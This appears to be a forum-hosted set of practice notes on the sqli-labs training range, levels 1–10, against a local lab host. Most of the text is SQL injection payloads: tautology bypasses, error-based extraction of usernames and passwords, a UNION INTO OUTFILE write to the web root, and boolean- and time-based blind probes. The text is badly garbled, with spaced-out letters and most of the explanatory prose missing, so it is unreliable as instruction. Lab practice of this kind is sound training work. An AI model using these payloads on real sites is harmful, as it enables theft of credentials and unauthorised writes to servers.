搜索

[20342] 2020-06-29_【web安全】sqli-lab靶场1-10关练习笔记

文档创建者:s7ckTeam
浏览次数:33
最后更新:2025-01-18
2020-06-29_【web安全】sqli-lab靶场1-10关练习笔记 w e b s q l i - l a b 1 - 1 0 K h a n   2 0 2 0 - 0 6 - 2 9   G 4 b r 1 e l 0 x 0 0   s q l i - l a b d o c k e r 0 x 0 1   s q l i - l a b 使 G E T & & & & u r l g e t ? i d = 1 h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 1 / ? i d = 1 u r l h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 1 / ? i d = 1 ' ,   . w e b u b u n t u 1 6 . 0 4 s u d o   a p t - g e t   u p d a t e   & &   s u d o   a p t - g e t   u p g r a d e   - y d o c k e r c u r l   - s   h t t p s : / / g e t . d o c k e r . c o m /   |   s h d o c k e r s q l i - l a b d o c k e r   s e a r c h   s q l i - l a b   / / d o c k e r   p u l l   a c g p i a n o / s q l i - l a b s d o c k e r   r u n   - d   - p   8 0 : 8 0   a c g p i a n o / s q l i - l a b s
s q l h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 1 / ? i d = - 1 '   o r   ' 1 o r   ' 1 ' t r u e   i d = ' - 1 ' f a l s e t r u e t r u e 0 x 0 2   s q l i - l a b G E T & & & & u r l g e t ? i d = 1 1 - 1 0 G E T u r l s e l e c t   *   f r o m   u s e r s   w h e r e   i d = ' 1 ' ' s e l e c t   *   f o r m   u s e r s   w h e r e   i d = ' - 1 '   o r   ' 1 ' h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 2 / ? i d = 1 a
使 i d = - 1 : t r u e t r u e 0 x 0 3   s q l i - l a b G E T & & & & & & 使 i d = - 1 : h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 2 / ? i d = - 1   o r   1 s e l e c t   *   f o r m   u s e r s   w h e r e   i d = - 1   o r   1 h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 3 / ? i d = - 1 ' )   o r   ( ' 1
t r u e s q l 0 x 0 4   s q l i - l a b G E T & & & & & & 使 i d = - 1 : 0 x 0 5   s q l i - l a b G E T & & & & & & & & i d = 1 s e l e c t   *   f o r m   u s e r s   w h e r e   i d = ( ' - 1 ' )   o r   ( ' 1 ' ) h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 4 / ? i d = - 1 " )   o r   ( " 1 s e l e c t   *   f o r m   u s e r s   w h e r e   i d = ( " - 1 " )   o r   ( " 1 " ) h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 5 / ? i d = 1 '   u n i o n   s e l e c t   c o u n t ( * ) ,   c o u n t ( * ) , c o n c a t ( 0 x 3 a , 0 x 3 a , ( s e l e c t   c o n c a t ( u s e r n a m e , 0 x 3 a , p a s s w o r d )   f r o m   u s e r s   w h e r e   i d = 1 ) , 0 x 3 a , 0 x 3 a
1 0 0 % D u m b 0 x 0 6   s q l i - l a b G E T & & & & & & & & i d = 1 1 0 0 % D u m b 0 x 0 7   s q l i - l a b s e l e c t   *   f r o m   u s e r s   w h e r e   i d = ' 1 '   u n i o n   s e l e c t   c o u n t ( * ) ,   c o u n t ( * ) , c o n c a t ( 0 x 3 a , 0 x 3 a , ( s e l e c t   c o n c a t ( u s e r n a m e , 0 x 3 a , p a s s w o r d )   f r o m   u s e r s   w h e r e   i d = 1 ) , 0 x 3 a , 0 x 3 a ,   h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 6 / ? i d = 1 "   u n i o n   s e l e c t   c o u n t ( * ) ,   c o u n t ( * ) , c o n c a t ( 0 x 3 a , 0 x 3 a , ( s e l e c t   c o n c a t ( u s e r n a m e , 0 x 3 a , p a s s w o r d )   f r o m   u s e r s   w h e r e   i d = 1 ) , 0 x 3 a , 0 x 3 a s e l e c t   *   f r o m   u s e r s   w h e r e   i d = " 1 "   u n i o n   s e l e c t   c o u n t ( * ) ,   c o u n t ( * ) , c o n c a t ( 0 x 3 a , 0 x 3 a , ( s e l e c t   c o n c a t ( u s e r n a m e , 0 x 3 a , p a s s w o r d )   f r o m   u s e r s   w h e r e   i d = 1 ) , 0 x 3 a , 0 x 3 a ,  
G E T & & & & & & & & d u m p 使 u n i o n l i n u x / v a r / w w w / h t m l d u m p h a c k e r . t x t h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / h a c k e r . t x t s q l 0 x 0 8   s q l i - l a b G E T & & & & s q l   a s c i i ( s u b s t r ( u s e r ( ) , 1 , 1 ) )   a s c i i h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 7 / ? i d = 1 " ) )   u n i o n   s e l e c t   1 , 2 , 3   - - ( (   " s e l e c t   *   f r o m   u s e r s   w h e r e   i d = ( ( ' 1 ' ) )   u n i o n   s e l e c t   1 , 2 , 3   - - ( (   ' ) h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 7 / ? i d = 1 ' ) )   u n i o n   s e l e c t   1 , ' h a c k e r   b y   x u x i n h e n ' , 3   i n t o   o u t f i l e   ' / v a r / w w w / h t m l / h a c k e r . t x t '   - -   ( (   ' s e l e c t   *   f r o m   u s e r s   w h e r e   i d = ( ( ' 1 ' ) )   u n i o n   s e l e c t   1 , ' h a c k e r   b y   x u x i n h e n ' , 3   i n t o   o u t f i l e   ' / v a r / w w w / h t m l / h a c k e r . t x t '   - -   ( (   '
a s c i i 1 0 0     Y o u   a r e   i n   1 0 0 a s c i i 1 0 0 - 1 5 0 a s c i i 1 1 4 r 0 x 0 9   s q l i - l a b G E T & & & & s l e e p a s c i i r o o t h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 8 / ? i d = 1 '   a n d   a s c i i ( s u b s t r ( u s e r ( ) , 1 , 1 ) ) < 1 0 0   - -   ' h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 8 / ? i d = 1 '   a n d   a s c i i ( s u b s t r ( u s e r ( ) , 1 , 1 ) ) < 1 5 0   - -   '  
M y s q l     i f ( 1 2 )   t r u e 1   2 5 r o o t 5 r o o t r o o t 0 x 1 0   s q l i - l a b G E T & & & & 2 3 : 1 4 r o o t r o o t S Q L w e b Q Q 2 0 6 3 3 6 7 6 7 1 h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 9 / ? i d = 1 '   a n d   s l e e p ( 5 )   - - ' h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 9 / ? i d = 1 '   a n d   i f ( ( s e l e c t   s u b s t r ( u s e r ( ) , 1 , 4 ) = ' r o o t '   ) , s l e e p ( 5 ) , n u l l )   - - ' h t t p : / / 1 9 2 . 1 6 8 . 2 8 . 5 8 / L e s s - 1 0 / ? i d = 1 "   a n d   i f ( ( s e l e c t   s u b s t r ( u s e r ( ) , 1 , 4 ) = ' r o o t '   ) , s l e e p ( 5 ) , n u l l )   - - "
E N D
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理